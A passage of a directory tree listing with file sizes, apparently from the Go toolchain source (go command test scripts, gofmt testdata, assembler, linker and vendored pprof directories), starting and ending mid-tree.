│ │ │ │ │ ├── [ 296] test_match_no_benchmarks.txt
│ │ │ │ │ ├── [ 381] test_match_no_subtests_failure.txt
│ │ │ │ │ ├── [ 472] test_match_no_subtests_parallel.txt
│ │ │ │ │ ├── [ 260] test_match_no_subtests.txt
│ │ │ │ │ ├── [ 385] test_match_no_tests_build_failure.txt
│ │ │ │ │ ├── [ 198] test_match_no_tests.txt
│ │ │ │ │ ├── [ 261] test_match_no_tests_with_subtests.txt
│ │ │ │ │ ├── [ 283] test_match_only_benchmarks.txt
│ │ │ │ │ ├── [ 583] test_match_only_example.txt
│ │ │ │ │ ├── [ 515] test_match_only_subtests_parallel.txt
│ │ │ │ │ ├── [ 295] test_match_only_subtests.txt
│ │ │ │ │ ├── [ 239] test_match_only_tests.txt
│ │ │ │ │ ├── [ 204] test_minus_n.txt
│ │ │ │ │ ├── [ 496] test_no_run_example.txt
│ │ │ │ │ ├── [ 224] test_no_tests.txt
│ │ │ │ │ ├── [ 393] test_overlay.txt
│ │ │ │ │ ├── [ 608] test_parallel_number.txt
│ │ │ │ │ ├── [ 628] test_profile.txt
│ │ │ │ │ ├── [ 680] test_race_cover_mode_issue20435.txt
│ │ │ │ │ ├── [1.8K] test_race_install_cgo.txt
│ │ │ │ │ ├── [ 341] test_race_install.txt
│ │ │ │ │ ├── [ 640] test_race.txt
│ │ │ │ │ ├── [ 328] test_rebuildall.txt
│ │ │ │ │ ├── [1.9K] test_regexps.txt
│ │ │ │ │ ├── [ 688] test_relative_cmdline.txt
│ │ │ │ │ ├── [ 581] test_relative_import_dash_i.txt
│ │ │ │ │ ├── [ 443] test_relative_import.txt
│ │ │ │ │ ├── [ 272] test_script_cmdcd.txt
│ │ │ │ │ ├── [5.2K] test_shuffle.txt
│ │ │ │ │ ├── [ 992] test_source_order.txt
│ │ │ │ │ ├── [ 220] test_status.txt
│ │ │ │ │ ├── [ 534] test_syntax_error_says_fail.txt
│ │ │ │ │ ├── [ 448] test_timeout.txt
│ │ │ │ │ ├── [ 477] test_trimpath_main.txt
│ │ │ │ │ ├── [ 539] test_trimpath_test_suffix.txt
│ │ │ │ │ ├── [ 657] test_trimpath.txt
│ │ │ │ │ ├── [1000] test_vendor.txt
│ │ │ │ │ ├── [2.1K] test_vet.txt
│ │ │ │ │ ├── [ 360] test_write_profiles_on_timeout.txt
│ │ │ │ │ ├── [ 357] test_xtestonly_works.txt
│ │ │ │ │ ├── [3.8K] toolexec.txt
│ │ │ │ │ ├── [1.2K] vendor_complex.txt
│ │ │ │ │ ├── [ 977] vendor_gopath_issue11409.txt
│ │ │ │ │ ├── [ 122] vendor_import_missing.txt
│ │ │ │ │ ├── [2.0K] vendor_import.txt
│ │ │ │ │ ├── [ 340] vendor_import_wrong.txt
│ │ │ │ │ ├── [ 398] vendor_issue12156.txt
│ │ │ │ │ ├── [ 639] vendor_list_issue11977.txt
│ │ │ │ │ ├── [ 237] vendor_resolve.txt
│ │ │ │ │ ├── [ 617] vendor_test_issue11864.txt
│ │ │ │ │ ├── [ 743] vendor_test_issue14613.txt
│ │ │ │ │ ├── [2.0K] version_build_settings.txt
│ │ │ │ │ ├── [2.7K] version_buildvcs_bzr.txt
│ │ │ │ │ ├── [2.4K] version_buildvcs_fossil.txt
│ │ │ │ │ ├── [2.3K] version_buildvcs_git_gpg.txt
│ │ │ │ │ ├── [4.2K] version_buildvcs_git.txt
│ │ │ │ │ ├── [2.2K] version_buildvcs_hg.txt
│ │ │ │ │ ├── [1.6K] version_buildvcs_nested.txt
│ │ │ │ │ ├── [ 376] version_goexperiment.txt
│ │ │ │ │ ├── [ 989] version_replace.txt
│ │ │ │ │ ├── [1.8K] version.txt
│ │ │ │ │ ├── [ 583] vet_asm.txt
│ │ │ │ │ ├── [ 354] vet_deps.txt
│ │ │ │ │ ├── [2.8K] vet_flags.txt
│ │ │ │ │ ├── [1.5K] vet_internal.txt
│ │ │ │ │ ├── [ 799] vet.txt
│ │ │ │ │ ├── [ 192] work_build_no_modules.txt
│ │ │ │ │ ├── [2.2K] work_edit.txt
│ │ │ │ │ ├── [ 397] work_env.txt
│ │ │ │ │ ├── [ 314] work_gowork.txt
│ │ │ │ │ ├── [ 367] work_init_gowork.txt
│ │ │ │ │ ├── [ 351] work_init_path.txt
│ │ │ │ │ ├── [ 435] work_install_submodule.txt
│ │ │ │ │ ├── [ 749] work_issue51204.txt
│ │ │ │ │ ├── [ 545] work_module_not_in_go_work.txt
│ │ │ │ │ ├── [ 783] work_nowork.txt
│ │ │ │ │ ├── [3.1K] work_prune_all.txt
│ │ │ │ │ ├── [1.7K] work_prune.txt
│ │ │ │ │ ├── [1.3K] work_regression_hang.txt
│ │ │ │ │ ├── [ 828] work_replace_conflict_override.txt
│ │ │ │ │ ├── [1009] work_replace_conflict.txt
│ │ │ │ │ ├── [1.1K] work_replace_main_module.txt
│ │ │ │ │ ├── [ 948] work_replace.txt
│ │ │ │ │ ├── [1.3K] work_sum_mismatch.txt
│ │ │ │ │ ├── [ 833] work_sum.txt
│ │ │ │ │ ├── [1.3K] work_sync_irrelevant_dependency.txt
│ │ │ │ │ ├── [ 208] work_sync_missing_module.txt
│ │ │ │ │ ├── [1.2K] work_sync_relevant_dependency.txt
│ │ │ │ │ ├── [ 864] work_sync_sum.txt
│ │ │ │ │ ├── [1.2K] work_sync.txt
│ │ │ │ │ ├── [2.6K] work.txt
│ │ │ │ │ ├── [ 376] work_use_deleted.txt
│ │ │ │ │ ├── [1.2K] work_use_dot.txt
│ │ │ │ │ ├── [ 215] work_use_issue50958.txt
│ │ │ │ │ ├── [ 312] work_use_noargs.txt
│ │ │ │ │ ├── [ 381] work_use_only_dirs.txt
│ │ │ │ │ ├── [ 374] work_use.txt
│ │ │ │ │ ├── [ 222] work_vet.txt
│ │ │ │ │ └── [1.5K] work_why_download_graph.txt
│ │ │ │ └── [2.3K] vendormod.txt
│ │ │ ├── [4.0K] gofmt
│ │ │ │ ├── [3.2K] doc.go
│ │ │ │ ├── [ 14K] gofmt.go
│ │ │ │ ├── [5.0K] internal.go
│ │ │ │ ├── [8.2K] rewrite.go
│ │ │ │ ├── [4.7K] simplify.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [ 76] comments.golden
│ │ │ │ ├── [ 76] comments.input
│ │ │ │ ├── [2.5K] composites.golden
│ │ │ │ ├── [3.2K] composites.input
│ │ │ │ ├── [ 230] crlf.golden
│ │ │ │ ├── [ 243] crlf.input
│ │ │ │ ├── [ 140] emptydecl.golden
│ │ │ │ ├── [ 148] emptydecl.input
│ │ │ │ ├── [1.9K] go2numbers.golden
│ │ │ │ ├── [2.0K] go2numbers.input
│ │ │ │ ├── [2.1K] import.golden
│ │ │ │ ├── [2.1K] import.input
│ │ │ │ ├── [ 249] issue28082.golden
│ │ │ │ ├── [ 447] issue28082.input
│ │ │ │ ├── [ 307] ranges.golden
│ │ │ │ ├── [ 304] ranges.input
│ │ │ │ ├── [ 350] rewrite10.golden
│ │ │ │ ├── [ 350] rewrite10.input
│ │ │ │ ├── [ 248] rewrite1.golden
│ │ │ │ ├── [ 248] rewrite1.input
│ │ │ │ ├── [ 407] rewrite2.golden
│ │ │ │ ├── [ 406] rewrite2.input
│ │ │ │ ├── [ 422] rewrite3.golden
│ │ │ │ ├── [ 422] rewrite3.input
│ │ │ │ ├── [1.0K] rewrite4.golden
│ │ │ │ ├── [1.1K] rewrite4.input
│ │ │ │ ├── [ 446] rewrite5.golden
│ │ │ │ ├── [ 538] rewrite5.input
│ │ │ │ ├── [ 463] rewrite6.golden
│ │ │ │ ├── [ 463] rewrite6.input
│ │ │ │ ├── [ 466] rewrite7.golden
│ │ │ │ ├── [ 472] rewrite7.input
│ │ │ │ ├── [ 292] rewrite8.golden
│ │ │ │ ├── [ 300] rewrite8.input
│ │ │ │ ├── [ 228] rewrite9.golden
│ │ │ │ ├── [ 238] rewrite9.input
│ │ │ │ ├── [ 927] slices1.golden
│ │ │ │ ├── [ 957] slices1.input
│ │ │ │ ├── [ 32] stdin1.golden
│ │ │ │ ├── [ 32] stdin1.input
│ │ │ │ ├── [ 101] stdin2.golden
│ │ │ │ ├── [ 101] stdin2.input
│ │ │ │ ├── [ 101] stdin3.golden
│ │ │ │ ├── [ 96] stdin3.input
│ │ │ │ ├── [ 38] stdin4.golden
│ │ │ │ ├── [ 39] stdin4.input
│ │ │ │ ├── [ 55] stdin5.golden
│ │ │ │ ├── [ 54] stdin5.input
│ │ │ │ ├── [ 199] stdin6.golden
│ │ │ │ ├── [ 217] stdin6.input
│ │ │ │ ├── [ 342] stdin7.golden
│ │ │ │ ├── [ 296] stdin7.input
│ │ │ │ ├── [ 365] typealias.golden
│ │ │ │ ├── [ 360] typealias.input
│ │ │ │ ├── [ 680] typeparams.golden
│ │ │ │ ├── [ 677] typeparams.input
│ │ │ │ ├── [1.4K] typeswitch.golden
│ │ │ │ └── [1.4K] typeswitch.input
│ │ │ ├── [ 658] go.mod
│ │ │ ├── [2.5K] go.sum
│ │ │ ├── [4.0K] internal
│ │ │ │ ├── [4.0K] archive
│ │ │ │ │ ├── [ 12K] archive.go
│ │ │ │ │ └── [4.0K] testdata
│ │ │ │ │ ├── [ 224] go1.go
│ │ │ │ │ ├── [ 224] go2.go
│ │ │ │ │ └── [4.0K] mycgo
│ │ │ │ │ ├── [ 211] c1.c
│ │ │ │ │ ├── [ 211] c2.c
│ │ │ │ │ ├── [ 224] go1.go
│ │ │ │ │ ├── [ 224] go2.go
│ │ │ │ │ └── [ 62] go.go
│ │ │ │ ├── [4.0K] bio
│ │ │ │ │ ├── [3.1K] buf.go
│ │ │ │ │ ├── [1.7K] buf_mmap.go
│ │ │ │ │ ├── [ 392] buf_nommap.go
│ │ │ │ │ └── [ 883] must.go
│ │ │ │ ├── [4.0K] browser
│ │ │ │ │ └── [1.7K] browser.go
│ │ │ │ ├── [4.0K] buildid
│ │ │ │ │ ├── [9.0K] buildid.go
│ │ │ │ │ ├── [5.8K] note.go
│ │ │ │ │ ├── [5.1K] rewrite.go
│ │ │ │ │ └── [4.0K] testdata
│ │ │ │ │ ├── [ 17K] a.elf.base64
│ │ │ │ │ ├── [ 18K] a.macho.base64
│ │ │ │ │ ├── [4.7K] a.pe.base64
│ │ │ │ │ └── [ 913] p.a.base64
│ │ │ │ ├── [4.0K] codesign
│ │ │ │ │ └── [8.0K] codesign.go
│ │ │ │ ├── [4.0K] dwarf
│ │ │ │ │ ├── [ 16K] dwarf_defs.go
│ │ │ │ │ └── [ 46K] dwarf.go
│ │ │ │ ├── [4.0K] edit
│ │ │ │ │ └── [2.5K] edit.go
│ │ │ │ ├── [4.0K] gcprog
│ │ │ │ │ └── [7.4K] gcprog.go
│ │ │ │ ├── [4.0K] goobj
│ │ │ │ │ ├── [1.1K] builtin.go
│ │ │ │ │ ├── [6.9K] builtinlist.go
│ │ │ │ │ ├── [3.7K] funcinfo.go
│ │ │ │ │ ├── [3.9K] mkbuiltin.go
│ │ │ │ │ └── [ 23K] objfile.go
│ │ │ │ ├── [4.0K] metadata
│ │ │ │ │ └── [ 720] main.go
│ │ │ │ ├── [4.0K] obj
│ │ │ │ │ ├── [ 351] abi_string.go
│ │ │ │ │ ├── [1.1K] addrtype_string.go
│ │ │ │ │ ├── [4.0K] arm
│ │ │ │ │ │ ├── [1.3K] anames5.go
│ │ │ │ │ │ ├── [1.4K] anames.go
│ │ │ │ │ │ ├── [7.0K] a.out.go
│ │ │ │ │ │ ├── [ 78K] asm5.go
│ │ │ │ │ │ ├── [3.1K] list5.go
│ │ │ │ │ │ └── [ 21K] obj5.go
│ │ │ │ │ ├── [4.0K] arm64
│ │ │ │ │ │ ├── [1.6K] anames7.go
│ │ │ │ │ │ ├── [5.4K] anames.go
│ │ │ │ │ │ ├── [ 18K] a.out.go
│ │ │ │ │ │ ├── [187K] asm7.go
│ │ │ │ │ │ ├── [ 514] asm_arm64_test.s
│ │ │ │ │ │ ├── [9.6K] doc.go
│ │ │ │ │ │ ├── [6.0K] list7.go
│ │ │ │ │ │ ├── [ 29K] obj7.go
│ │ │ │ │ │ ├── [5.5K] specialoperand_string.go
│ │ │ │ │ │ └── [ 35K] sysRegEnc.go
│ │ │ │ │ ├── [6.7K] data.go
│ │ │ │ │ ├── [ 23K] dwarf.go
│ │ │ │ │ ├── [ 342] go.go
│ │ │ │ │ ├── [4.0K] inl.go
│ │ │ │ │ ├── [2.6K] ld.go
│ │ │ │ │ ├── [ 971] line.go
│ │ │ │ │ ├── [ 30K] link.go
│ │ │ │ │ ├── [4.0K] mips
│ │ │ │ │ │ ├── [ 554] anames0.go
│ │ │ │ │ │ ├── [1.3K] anames.go
│ │ │ │ │ │ ├── [7.5K] a.out.go
│ │ │ │ │ │ ├── [ 54K] asm0.go
│ │ │ │ │ │ ├── [2.5K] list0.go
│ │ │ │ │ │ └── [ 30K] obj0.go
│ │ │ │ │ ├── [ 22K] objfile.go
│ │ │ │ │ ├── [5.0K] pass.go
│ │ │ │ │ ├── [ 12K] pcln.go
│ │ │ │ │ ├── [ 10K] plist.go
│ │ │ │ │ ├── [4.0K] ppc64
│ │ │ │ │ │ ├── [ 643] anames9.go
│ │ │ │ │ │ ├── [6.8K] anames.go
│ │ │ │ │ │ ├── [ 16K] a.out.go
│ │ │ │ │ │ ├── [148K] asm9.go
│ │ │ │ │ │ ├── [9.6K] doc.go
│ │ │ │ │ │ ├── [2.9K] list9.go
│ │ │ │ │ │ └── [ 34K] obj9.go
│ │ │ │ │ ├── [4.0K] riscv
│ │ │ │ │ │ ├── [2.6K] anames.go
│ │ │ │ │ │ ├── [ 11K] cpu.go
│ │ │ │ │ │ ├── [ 12K] inst.go
│ │ │ │ │ │ ├── [ 677] list.go
│ │ │ │ │ │ ├── [ 64K] obj.go
│ │ │ │ │ │ └── [4.0K] testdata
│ │ │ │ │ │ └── [4.0K] testbranch
│ │ │ │ │ │ └── [2.4K] branch_test.s
│ │ │ │ │ ├── [4.0K] s390x
│ │ │ │ │ │ ├── [7.1K] anames.go
│ │ │ │ │ │ ├── [ 505] anamesz.go
│ │ │ │ │ │ ├── [ 12K] a.out.go
│ │ │ │ │ │ ├── [174K] asmz.go
│ │ │ │ │ │ ├── [3.2K] condition_code.go
│ │ │ │ │ │ ├── [2.4K] listz.go
│ │ │ │ │ │ ├── [ 21K] objz.go
│ │ │ │ │ │ ├── [3.6K] rotate.go
│ │ │ │ │ │ └── [ 19K] vector.go
│ │ │ │ │ ├── [2.2K] stringer.go
│ │ │ │ │ ├── [ 13K] sym.go
│ │ │ │ │ ├── [1.6K] textflag.go
│ │ │ │ │ ├── [ 16K] util.go
│ │ │ │ │ ├── [4.0K] wasm
│ │ │ │ │ │ ├── [2.7K] anames.go
│ │ │ │ │ │ ├── [4.2K] a.out.go
│ │ │ │ │ │ └── [ 29K] wasmobj.go
│ │ │ │ │ └── [4.0K] x86
│ │ │ │ │ ├── [ 16K] aenum.go
│ │ │ │ │ ├── [ 19K] anames.go
│ │ │ │ │ ├── [6.8K] a.out.go
│ │ │ │ │ ├── [146K] asm6.go
│ │ │ │ │ ├── [260K] avx_optabs.go
│ │ │ │ │ ├── [9.3K] evex.go
│ │ │ │ │ ├── [4.1K] list6.go
│ │ │ │ │ ├── [ 38K] obj6.go
│ │ │ │ │ └── [1.2K] ytab.go
│ │ │ │ ├── [4.0K] objabi
│ │ │ │ │ ├── [1.8K] autotype.go
│ │ │ │ │ ├── [8.7K] flag.go
│ │ │ │ │ ├── [1.6K] funcdata.go
│ │ │ │ │ ├── [2.6K] funcid.go
│ │ │ │ │ ├── [2.9K] head.go
│ │ │ │ │ ├── [3.5K] line.go
│ │ │ │ │ ├── [1.9K] path.go
│ │ │ │ │ ├── [ 13K] reloctype.go
│ │ │ │ │ ├── [3.0K] reloctype_string.go
│ │ │ │ │ ├── [ 895] stack.go
│ │ │ │ │ ├── [2.7K] symkind.go
│ │ │ │ │ ├── [1.1K] symkind_string.go
│ │ │ │ │ ├── [ 647] typekind.go
│ │ │ │ │ └── [ 836] util.go
│ │ │ │ ├── [4.0K] objfile
│ │ │ │ │ ├── [ 11K] disasm.go
│ │ │ │ │ ├── [2.6K] elf.go
│ │ │ │ │ ├── [7.8K] goobj.go
│ │ │ │ │ ├── [3.0K] macho.go
│ │ │ │ │ ├── [4.2K] objfile.go
│ │ │ │ │ ├── [5.1K] pe.go
│ │ │ │ │ ├── [3.5K] plan9obj.go
│ │ │ │ │ └── [3.9K] xcoff.go
│ │ │ │ ├── [4.0K] osinfo
│ │ │ │ │ ├── [ 215] doc.go
│ │ │ │ │ ├── [ 621] os_js.go
│ │ │ │ │ ├── [ 396] os_plan9.go
│ │ │ │ │ ├── [ 826] os_unix.go
│ │ │ │ │ └── [ 441] os_windows.go
│ │ │ │ ├── [4.0K] pkgpath
│ │ │ │ │ └── [4.5K] pkgpath.go
│ │ │ │ ├── [4.0K] quoted
│ │ │ │ │ └── [2.8K] quoted.go
│ │ │ │ ├── [4.0K] src
│ │ │ │ │ ├── [ 16K] pos.go
│ │ │ │ │ └── [5.0K] xpos.go
│ │ │ │ ├── [4.0K] sys
│ │ │ │ │ ├── [6.2K] arch.go
│ │ │ │ │ ├── [ 550] args.go
│ │ │ │ │ └── [4.3K] supported.go
│ │ │ │ ├── [4.0K] test2json
│ │ │ │ │ ├── [ 13K] test2json.go
│ │ │ │ │ └── [4.0K] testdata
│ │ │ │ │ ├── [ 817] ascii.json
│ │ │ │ │ ├── [ 381] ascii.test
│ │ │ │ │ ├── [ 327] benchfail.json
│ │ │ │ │ ├── [ 90] benchfail.test
│ │ │ │ │ ├── [ 937] bench.json
│ │ │ │ │ ├── [ 518] benchshort.json
│ │ │ │ │ ├── [ 318] benchshort.test
│ │ │ │ │ ├── [ 302] bench.test
│ │ │ │ │ ├── [ 0] empty.json
│ │ │ │ │ ├── [ 0] empty.test
│ │ │ │ │ ├── [ 828] issue23036.json
│ │ │ │ │ ├── [ 286] issue23036.test
│ │ │ │ │ ├── [ 937] issue23920.json
│ │ │ │ │ ├── [ 223] issue23920.test
│ │ │ │ │ ├── [3.5K] issue29755.json
│ │ │ │ │ ├── [1.1K] issue29755.test
│ │ │ │ │ ├── [1.4K] panic.json
│ │ │ │ │ ├── [ 479] panic.test
│ │ │ │ │ ├── [ 12K] smiley.json
│ │ │ │ │ ├── [3.3K] smiley.test
│ │ │ │ │ ├── [1.2K] unicode.json
│ │ │ │ │ ├── [ 740] unicode.test
│ │ │ │ │ ├── [ 12K] vet.json
│ │ │ │ │ └── [3.1K] vet.test
│ │ │ │ └── [4.0K] traceviewer
│ │ │ │ └── [1.2K] format.go
│ │ │ ├── [4.0K] link
│ │ │ │ ├── [4.0K] doc.go
│ │ │ │ ├── [4.0K] internal
│ │ │ │ │ ├── [4.0K] amd64
│ │ │ │ │ │ ├── [ 20K] asm.go
│ │ │ │ │ │ ├── [1.9K] l.go
│ │ │ │ │ │ └── [3.8K] obj.go
│ │ │ │ │ ├── [4.0K] arm
│ │ │ │ │ │ ├── [ 22K] asm.go
│ │ │ │ │ │ ├── [3.6K] l.go
│ │ │ │ │ │ └── [3.4K] obj.go
│ │ │ │ │ ├── [4.0K] arm64
│ │ │ │ │ │ ├── [ 43K] asm.go
│ │ │ │ │ │ ├── [3.5K] l.go
│ │ │ │ │ │ └── [3.7K] obj.go
│ │ │ │ │ ├── [4.0K] benchmark
│ │ │ │ │ │ └── [4.7K] bench.go
│ │ │ │ │ ├── [4.0K] dwtest
│ │ │ │ │ │ └── [5.4K] dwtest.go
│ │ │ │ │ ├── [4.0K] ld
│ │ │ │ │ │ ├── [5.4K] ar.go
│ │ │ │ │ │ ├── [5.2K] asmb.go
│ │ │ │ │ │ ├── [7.2K] config.go
│ │ │ │ │ │ ├── [ 89K] data.go
│ │ │ │ │ │ ├── [ 16K] deadcode.go
│ │ │ │ │ │ ├── [9.5K] decodesym.go
│ │ │ │ │ │ ├── [ 73K] dwarf.go
│ │ │ │ │ │ ├── [ 59K] elf.go
│ │ │ │ │ │ ├── [1.9K] errors.go
│ │ │ │ │ │ ├── [ 915] execarchive.go
│ │ │ │ │ │ ├── [ 343] execarchive_noexec.go
│ │ │ │ │ │ ├── [ 12K] go.go
│ │ │ │ │ │ ├── [ 960] heap.go
│ │ │ │ │ │ ├── [8.1K] ld.go
│ │ │ │ │ │ ├── [ 75K] lib.go
│ │ │ │ │ │ ├── [5.1K] link.go
│ │ │ │ │ │ ├── [ 13K] macho_combine_dwarf.go
│ │ │ │ │ │ ├── [ 43K] macho.go
│ │ │ │ │ │ ├── [ 14K] main.go
│ │ │ │ │ │ ├── [1.5K] outbuf_darwin.go
│ │ │ │ │ │ ├── [8.1K] outbuf.go
│ │ │ │ │ │ ├── [ 304] outbuf_linux.go
│ │ │ │ │ │ ├── [1.5K] outbuf_mmap.go
│ │ │ │ │ │ ├── [ 342] outbuf_nofallocate.go
│ │ │ │ │ │ ├── [ 805] outbuf_nommap.go
│ │ │ │ │ │ ├── [ 292] outbuf_notdarwin.go
│ │ │ │ │ │ ├── [1.7K] outbuf_windows.go
│ │ │ │ │ │ ├── [ 29K] pcln.go
│ │ │ │ │ │ ├── [ 46K] pe.go
│ │ │ │ │ │ ├── [ 12K] stackcheck.go
│ │ │ │ │ │ ├── [3.9K] sym.go
│ │ │ │ │ │ ├── [ 29K] symtab.go
│ │ │ │ │ │ ├── [3.7K] target.go
│ │ │ │ │ │ ├── [4.0K] testdata
│ │ │ │ │ │ │ ├── [4.0K] deadcode
│ │ │ │ │ │ │ │ ├── [ 488] ifacemethod2.go
│ │ │ │ │ │ │ │ ├── [ 615] ifacemethod3.go
│ │ │ │ │ │ │ │ ├── [ 513] ifacemethod4.go
│ │ │ │ │ │ │ │ ├── [ 765] ifacemethod.go
│ │ │ │ │ │ │ │ ├── [ 474] reflectcall.go
│ │ │ │ │ │ │ │ └── [ 306] typedesc.go
│ │ │ │ │ │ │ ├── [4.0K] httptest
│ │ │ │ │ │ │ │ └── [4.0K] main
│ │ │ │ │ │ │ │ └── [ 464] main.go
│ │ │ │ │ │ │ ├── [4.0K] issue10978
│ │ │ │ │ │ │ │ ├── [ 478] main.go
│ │ │ │ │ │ │ │ └── [ 85] main.s
│ │ │ │ │ │ │ ├── [4.0K] issue25459
│ │ │ │ │ │ │ │ ├── [4.0K] a
│ │ │ │ │ │ │ │ │ └── [ 363] a.go
│ │ │ │ │ │ │ │ └── [4.0K] main
│ │ │ │ │ │ │ │ └── [ 149] main.go
│ │ │ │ │ │ │ ├── [4.0K] issue26237
│ │ │ │ │ │ │ │ ├── [4.0K] b.dir
│ │ │ │ │ │ │ │ │ └── [ 166] b.go
│ │ │ │ │ │ │ │ └── [4.0K] main
│ │ │ │ │ │ │ │ └── [ 210] main.go
│ │ │ │ │ │ │ ├── [4.0K] issue32233
│ │ │ │ │ │ │ │ ├── [4.0K] lib
│ │ │ │ │ │ │ │ │ ├── [ 428] lib.go
│ │ │ │ │ │ │ │ │ └── [ 508] ObjC.m
│ │ │ │ │ │ │ │ └── [4.0K] main
│ │ │ │ │ │ │ │ └── [ 256] main.go
│ │ │ │ │ │ │ ├── [4.0K] issue38192
│ │ │ │ │ │ │ │ ├── [ 237] main.go
│ │ │ │ │ │ │ │ └── [ 235] oneline.s
│ │ │ │ │ │ │ ├── [4.0K] issue39256
│ │ │ │ │ │ │ │ ├── [ 489] x.go
│ │ │ │ │ │ │ │ └── [ 275] x.s
│ │ │ │ │ │ │ ├── [4.0K] issue39757
│ │ │ │ │ │ │ │ └── [ 291] issue39757main.go
│ │ │ │ │ │ │ ├── [4.0K] issue42484
│ │ │ │ │ │ │ │ └── [ 132] main.go
│ │ │ │ │ │ │ └── [4.0K] stackcheck
│ │ │ │ │ │ │ ├── [ 345] main.go
│ │ │ │ │ │ │ └── [ 914] main.s
│ │ │ │ │ │ ├── [1.9K] typelink.go
│ │ │ │ │ │ ├── [2.5K] util.go
│ │ │ │ │ │ └── [ 52K] xcoff.go
│ │ │ │ │ ├── [4.0K] loadelf
│ │ │ │ │ │ └── [ 31K] ldelf.go
│ │ │ │ │ ├── [4.0K] loader
│ │ │ │ │ │ ├── [ 78K] loader.go
│ │ │ │ │ │ └── [ 14K] symbolbuilder.go
│ │ │ │ │ ├── [4.0K] loadmacho
│ │ │ │ │ │ └── [ 19K] ldmacho.go
│ │ │ │ │ ├── [4.0K] loadpe
│ │ │ │ │ │ └── [ 22K] ldpe.go
│ │ │ │ │ ├── [4.0K] loadxcoff
│ │ │ │ │ │ └── [6.2K] ldxcoff.go
│ │ │ │ │ ├── [4.0K] mips
│ │ │ │ │ │ ├── [5.5K] asm.go
│ │ │ │ │ │ ├── [3.5K] l.go
│ │ │ │ │ │ └── [2.8K] obj.go
│ │ │ │ │ ├── [4.0K] mips64
│ │ │ │ │ │ ├── [5.1K] asm.go
│ │ │ │ │ │ ├── [3.5K] l.go
│ │ │ │ │ │ └── [3.1K] obj.go
│ │ │ │ │ ├── [4.0K] ppc64
│ │ │ │ │ │ ├── [ 42K] asm.go
│ │ │ │ │ │ ├── [3.5K] l.go
│ │ │ │ │ │ └── [3.2K] obj.go
│ │ │ │ │ ├── [4.0K] riscv64
│ │ │ │ │ │ ├── [ 12K] asm.go
│ │ │ │ │ │ ├── [ 288] l.go
│ │ │ │ │ │ └── [1.5K] obj.go
│ │ │ │ │ ├── [4.0K] s390x
│ │ │ │ │ │ ├── [ 14K] asm.go
│ │ │ │ │ │ ├── [3.5K] l.go
│ │ │ │ │ │ └── [2.8K] obj.go
│ │ │ │ │ ├── [4.0K] sym
│ │ │ │ │ │ ├── [1.3K] compilation_unit.go
│ │ │ │ │ │ ├── [ 651] library.go
│ │ │ │ │ │ ├── [1.8K] reloc.go
│ │ │ │ │ │ ├── [2.7K] segment.go
│ │ │ │ │ │ ├── [ 933] symbol.go
│ │ │ │ │ │ ├── [5.3K] symkind.go
│ │ │ │ │ │ └── [2.5K] symkind_string.go
│ │ │ │ │ ├── [4.0K] wasm
│ │ │ │ │ │ ├── [ 18K] asm.go
│ │ │ │ │ │ └── [ 646] obj.go
│ │ │ │ │ └── [4.0K] x86
│ │ │ │ │ ├── [ 14K] asm.go
│ │ │ │ │ ├── [1.9K] l.go
│ │ │ │ │ └── [3.5K] obj.go
│ │ │ │ ├── [1.8K] main.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [4.0K] pe-binutils
│ │ │ │ │ ├── [ 515] main.go
│ │ │ │ │ ├── [ 228] rsrc_386.syso
│ │ │ │ │ └── [ 228] rsrc_amd64.syso
│ │ │ │ ├── [4.0K] pe-llvm
│ │ │ │ │ ├── [1.7K] main.go
│ │ │ │ │ ├── [ 352] rsrc_386.syso
│ │ │ │ │ ├── [ 352] rsrc_amd64.syso
│ │ │ │ │ ├── [ 352] rsrc_arm64.syso
│ │ │ │ │ └── [ 352] rsrc_arm.syso
│ │ │ │ ├── [4.0K] testBuildFortvOS
│ │ │ │ │ ├── [ 75] lib.go
│ │ │ │ │ └── [ 70] main.m
│ │ │ │ ├── [4.0K] testHashedSyms
│ │ │ │ │ └── [ 908] p.go
│ │ │ │ ├── [4.0K] testIndexMismatch
│ │ │ │ │ ├── [ 211] a.go
│ │ │ │ │ ├── [ 211] b.go
│ │ │ │ │ └── [ 208] main.go
│ │ │ │ └── [4.0K] testRO
│ │ │ │ └── [ 435] x.go
│ │ │ ├── [4.0K] nm
│ │ │ │ ├── [1.3K] doc.go
│ │ │ │ └── [3.0K] nm.go
│ │ │ ├── [4.0K] objdump
│ │ │ │ ├── [2.6K] main.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [ 227] fmthellocgo.go
│ │ │ │ ├── [ 216] fmthello.go
│ │ │ │ └── [4.0K] testfilenum
│ │ │ │ ├── [ 183] a.go
│ │ │ │ ├── [ 183] b.go
│ │ │ │ ├── [ 183] c.go
│ │ │ │ └── [ 28] go.mod
│ │ │ ├── [4.0K] pack
│ │ │ │ ├── [1.5K] doc.go
│ │ │ │ └── [8.1K] pack.go
│ │ │ ├── [4.0K] pprof
│ │ │ │ ├── [ 420] doc.go
│ │ │ │ ├── [8.9K] pprof.go
│ │ │ │ ├── [3.2K] readlineui.go
│ │ │ │ ├── [ 905] README
│ │ │ │ └── [4.0K] testdata
│ │ │ │ └── [ 792] cpu.go
│ │ │ ├── [ 102] README.vendor
│ │ │ ├── [4.0K] test2json
│ │ │ │ └── [4.6K] main.go
│ │ │ ├── [4.0K] trace
│ │ │ │ ├── [ 35K] annotations.go
│ │ │ │ ├── [1.0K] doc.go
│ │ │ │ ├── [8.6K] goroutines.go
│ │ │ │ ├── [6.0K] main.go
│ │ │ │ ├── [ 13K] mmu.go
│ │ │ │ ├── [ 11K] pprof.go
│ │ │ │ └── [ 37K] trace.go
│ │ │ ├── [4.0K] vendor
│ │ │ │ ├── [4.0K] github.com
│ │ │ │ │ ├── [4.0K] google
│ │ │ │ │ │ └── [4.0K] pprof
│ │ │ │ │ │ ├── [ 305] AUTHORS
│ │ │ │ │ │ ├── [ 654] CONTRIBUTORS
│ │ │ │ │ │ ├── [4.0K] driver
│ │ │ │ │ │ │ └── [9.7K] driver.go
│ │ │ │ │ │ ├── [4.0K] internal
│ │ │ │ │ │ │ ├── [4.0K] binutils
│ │ │ │ │ │ │ │ ├── [5.9K] addr2liner.go
│ │ │ │ │ │ │ │ ├── [4.2K] addr2liner_llvm.go
│ │ │ │ │ │ │ │ ├── [4.0K] addr2liner_nm.go
│ │ │ │ │ │ │ │ ├── [ 22K] binutils.go
│ │ │ │ │ │ │ │ └── [5.2K] disasm.go
│ │ │ │ │ │ │ ├── [4.0K] driver
│ │ │ │ │ │ │ │ ├── [ 12K] cli.go
